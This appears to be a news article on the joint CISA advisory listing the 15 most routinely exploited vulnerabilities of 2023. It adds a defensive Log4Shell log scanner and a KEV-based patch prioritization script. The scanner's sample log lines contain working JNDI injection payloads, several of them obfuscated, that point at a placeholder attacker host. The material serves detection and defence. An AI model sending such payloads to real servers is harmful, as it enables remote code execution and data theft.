The US Cybersecurity and Infrastructure Security Agency (CISA), together with partner agencies, has published its list of the 15 most routinely exploited vulnerabilities of 2023 and is urging all organizations to implement the recommended mitigations. The list includes critical flaws in products from Microsoft, Cisco, Citrix, and other vendors.
Using these flaws, threat actors can bypass authentication, inject code, escalate privileges, execute code remotely (RCE), and steal data.
Most of the listed flaws were disclosed in 2023, and even the older ones have had patches available for years, so organizations have had plenty of time to apply them and other mitigations.
However, attackers increasingly rely on zero-day vulnerabilities, flaws that are exploited before a patch is available. Last year, the majority of the routinely exploited flaws were first exploited as zero-days.
“Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high-priority targets,” the advisory reads.
Attackers have the most success exploiting a vulnerability within the first two years after its public disclosure; after that its usefulness declines as systems are patched or retired. The cybersecurity agencies of the five countries that co-authored the advisory want to shrink that window.
The top 15 routinely exploited vulnerabilities
- Citrix NetScaler ADC and NetScaler Gateway are affected by code injection vulnerability CVE-2023-3519. It allows unauthenticated attackers to cause a stack buffer overflow in the NSPPE process by sending crafted HTTP GET requests.
- Citrix NetScaler ADC and NetScaler Gateway are also affected by the buffer overflow vulnerability CVE-2023-4966, known as Citrix Bleed. An unauthenticated attacker can use it to read appliance memory that contains valid session tokens, and then replay a token to hijack an authenticated session, bypassing MFA. Because stolen tokens stay valid after the fix is installed, Citrix advised terminating all active and persistent sessions after upgrading.
- Cisco’s web-based management interface (Web UI) for IOS XE, the operating system running on many Cisco networking products, is affected by privilege escalation vulnerability CVE-2023-20198. Unauthenticated remote attackers use it to gain initial access and create a local user account with privilege level 15, the highest administrative level on the device, and then log in with it. The Web UI is only reachable if the HTTP or HTTPS server feature is enabled; disabling it on internet-facing devices removes the attack surface.
- Cisco IOS XE is also vulnerable to a Web UI command injection flaw, CVE-2023-20273. Attackers chain it with the previous bug: once the new local user exists, they use it to inject commands that run with root privileges on the underlying system.
- Fortinet FortiOS and FortiProxy SSL-VPN, the software powering FortiGate firewalls and Fortinet's web proxy, was found to be vulnerable to a heap-based buffer overflow flaw, CVE-2023-27997, reachable before authentication. Remote attackers send crafted requests to the SSL-VPN interface to execute arbitrary code or commands.
- Progress MOVEit Transfer contains a SQL injection bug, CVE-2023-34362, that attackers chain into remote code execution: the injection yields a sysadmin API access token, and a deserialization call reachable with that token lets them run arbitrary code on the server.
- Atlassian Confluence Data Center and Server, a collaboration platform, is affected by a broken access control bug, CVE-2023-22515. Attackers exploit it to create unauthorized administrator accounts and upload malicious plugins, effectively taking over the instance.
- Apache’s Log4j library, a widely used open-source logging tool, is vulnerable to an RCE flaw known as Log4Shell, CVE-2021-44228. Any attacker-controlled string that an application logs, such as a User-Agent header or a URL parameter, can carry a JNDI lookup of the form ${jndi:ldap://attacker-host/x}; vulnerable Log4j versions resolve the lookup, fetch a remote object, and run attacker-supplied code. Attackers then exfiltrate data, deploy ransomware, or conduct other malicious activity. This flaw is still exploited despite being disclosed in December 2021.
- Barracuda Networks Email Security Gateway (ESG) appliances failed to properly validate the file names inside .tar archives attached to incoming emails, leading to a critical remote command injection vulnerability, CVE-2023-2868. Attackers exploit it to obtain unauthorized access and execute commands on the appliance.
- Zoho ManageEngine, a set of IT management tools, is vulnerable to an unauthenticated remote code execution flaw, CVE-2022-47966, caused by an outdated XML signature library. Attackers run arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. The flaw is exploitable only where SAML single sign-on is enabled, or, for some products, was ever enabled.
- PaperCut MF/NG, a print control and management system, had an improper access control flaw, CVE-2023-27350, in its SetupCompleted page. Attackers abuse it to bypass authentication and then execute code via the product's built-in scripting functionality.
- Microsoft Netlogon, a Windows service for secure authentication and communication between domain members, is affected by a privilege escalation bug, CVE-2020-1472, known as Zerologon. An attacker with network access to a domain controller establishes a vulnerable Netlogon secure channel connection via the Netlogon Remote Protocol and can take over the domain controller's machine account. Since Microsoft's February 2021 update, patched domain controllers reject such connections by default, so only unpatched controllers, or ones where administrators have used a non-default group policy to allow vulnerable connections, remain exposed. Discovered in 2020, this flaw has been among the top routinely exploited vulnerabilities for the third year in a row.
- JetBrains TeamCity servers, used for software build and deployment automation, are vulnerable to an authentication bypass flaw, CVE-2023-42793, that allows unauthenticated attackers to execute code remotely on the server.
- Microsoft Office Outlook, a popular email client, is affected by a privilege escalation vulnerability, CVE-2023-23397. Threat actors exploit it by sending a specially crafted message whose reminder property points to a UNC path on an attacker-controlled SMB server; Outlook connects to that path when it processes the reminder, without any user interaction, leaking the user's Net-NTLMv2 hash for relay or offline cracking. Blocking outbound SMB (TCP port 445) to the internet limits the damage on unpatched clients.
- ownCloud graphapi, an interface for managing data on the file-sharing platform, discloses information to unauthenticated attackers due to the CVE-2023-49103 flaw: the app shipped a third-party test file that prints the server's PHP configuration, including environment variables. In containerized deployments those variables hold the admin password, mail server credentials, license keys, and other sensitive data.
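The Log4Shell entry above describes the crafted request only in general terms. The following detection logic, added here as an example and not part of the advisory or the article, shows what a defender actually has to match: the `${jndi:...}` lookup is routinely percent-encoded or hidden behind Log4j's own `${lower:...}`, `${upper:...}` and `${x:-default}` lookups, so naive string matching on `${jndi:` misses it. The script decodes and normalizes each line before matching. The access-log lines are constructed samples, the 203.0.113.7 address is a documentation-range placeholder for an attacker host, and the function and class names are the author's own.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# Constructed web-server access log lines (not from any real system). Lines 2-5 carry a
# Log4Shell probe in the User-Agent or the query string, each obfuscated differently.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fc%7D"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/d}"',
    '10.0.0.3 - - [10/Dec/2021:14:02:16 +0000] "GET /docs/${version} HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
]

INNERMOST = re.compile(r"\$\{([^${}]*)\}")                       # a ${...} with no lookup nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)  # ${jndi:<scheme>:...}


def url_decode(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding, stopping once the text is stable."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def resolve_lookup(body: str) -> Optional[str]:
    """Return the literal text a single Log4j lookup evaluates to when it is one of the
    obfuscation-only forms attackers use; return None for a real lookup such as jndi."""
    if body.lstrip().lower().startswith("jndi:"):
        return None
    if ":-" in body:                     # ${anything:-default} evaluates to default, e.g. ${::-j} -> j
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return None


def _expand(match: "re.Match[str]") -> str:
    literal = resolve_lookup(match.group(1))
    return match.group(0) if literal is None else literal


def normalize(line: str) -> str:
    """Decode the line and collapse nested obfuscation lookups from the inside out until
    nothing more can be resolved, so ${${lower:j}ndi:...} becomes ${jndi:...}."""
    line = url_decode(line)
    while True:
        expanded = INNERMOST.sub(_expand, line)
        if expanded == line:
            return line
        line = expanded


@dataclass
class Finding:
    line_no: int
    scheme: str   # ldap, rmi, dns, ...
    lookup: str   # the normalized ${jndi:...} string


def scan(lines: List[str]) -> List[Finding]:
    """Run the normalizer over each log line and report every JNDI lookup it exposes."""
    findings = []
    for line_no, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            findings.append(Finding(line_no, m.group(1).lower(), norm[m.start():end + 1]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.scheme} lookup {f.lookup}")
```

The normalizer resolves only the lookups that cannot do anything but rewrite text; a real `${jndi:...}` or `${env:...}` is left in place, which is also what keeps the loop from running forever. Anything the scanner flags deserves a look at what the application logged from that request, not just the access log, since the lookup fires wherever the string reaches a vulnerable logger.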
The authoring agencies also listed dozens of other vulnerabilities that attackers routinely exploit. The advisory includes recommended mitigations for vendors, developers, and end-user organizations.
CISA recommends prompt software and firmware updates, prioritizing critical and already-exploited vulnerabilities, performing routine asset discovery so that exposed systems are known, and implementing a centralized patch management system, among other measures.
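Prioritizing in practice means joining what a vulnerability scanner reports against what is known to be exploited. The script below, added here as an example and not something the advisory or CISA provides, does that join with records shaped like CISA's Known Exploited Vulnerabilities (KEV) JSON feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json): it ranks open findings that appear in KEV by whether the entry is flagged for ransomware use and by how far past its remediation due date it is, and drops findings that are not in KEV from the urgent list. The KEV records embedded here use the feed's real field names but constructed due dates and ransomware flags, the host inventory is constructed, and CVE-9999-0001 is a synthetic placeholder for a non-KEV finding.

```python
import csv
import io
import json
from datetime import date
from typing import Dict, List

# Constructed KEV-style feed. Field names follow CISA's KEV JSON; the dueDate and
# knownRansomwareCampaignUse values are illustrative, not copied from the feed.
KEV_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2023-3519", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
     "dueDate": "2023-08-09", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-4966", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
     "dueDate": "2023-11-08", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-34362", "vendorProject": "Progress", "product": "MOVEit Transfer",
     "dueDate": "2023-06-23", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "dueDate": "2021-12-24", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-20198", "vendorProject": "Cisco", "product": "IOS XE Web UI",
     "dueDate": "2023-10-20", "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed scanner export: one row per host, open CVE IDs separated by ';'.
# CVE-9999-0001 is a synthetic placeholder for a finding that is not in KEV.
INVENTORY_CSV = """hostname,owner,open_cves
vpn-gw-01,netops,CVE-2023-3519;CVE-2023-4966
mft-01,appsec,CVE-2023-34362
core-rtr-02,netops,CVE-2023-20198;CVE-9999-0001
build-07,devops,CVE-2021-44228
"""


def load_kev(raw_json: str) -> Dict[str, dict]:
    """Index KEV records by CVE ID; the real feed has the same top-level shape."""
    return {v["cveID"]: v for v in json.loads(raw_json)["vulnerabilities"]}


def prioritize(inventory_csv: str, kev: Dict[str, dict], today_iso: str) -> List[dict]:
    """Join each host's open CVEs against KEV and rank them: ransomware-linked entries
    first, then by days past the KEV due date. Findings not in KEV are left out."""
    today = date.fromisoformat(today_iso)
    ranked = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        for cve in filter(None, row["open_cves"].split(";")):
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            ranked.append({
                "hostname": row["hostname"],
                "owner": row["owner"],
                "cve": cve,
                "product": f'{entry["vendorProject"]} {entry["product"]}',
                "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
                "days_overdue": (today - due).days,
            })
    ranked.sort(key=lambda r: (not r["ransomware"], -r["days_overdue"]))
    return ranked


if __name__ == "__main__":
    for r in prioritize(INVENTORY_CSV, load_kev(KEV_JSON), date.today().isoformat()):
        tag = "RANSOMWARE" if r["ransomware"] else "kev"
        print(f'{r["hostname"]:<12} {r["cve"]:<15} {r["days_overdue"]:>5}d overdue  {tag:<10} {r["product"]}')
```

Against the live feed, replace `KEV_JSON` with the downloaded file and `INVENTORY_CSV` with the scanner's export; the join does not depend on product-name matching, only on CVE IDs, which is why a scanner that emits CVE IDs is the precondition for this kind of prioritization. Findings that fall out of the KEV filter still need patching, just on the normal cycle rather than the urgent one.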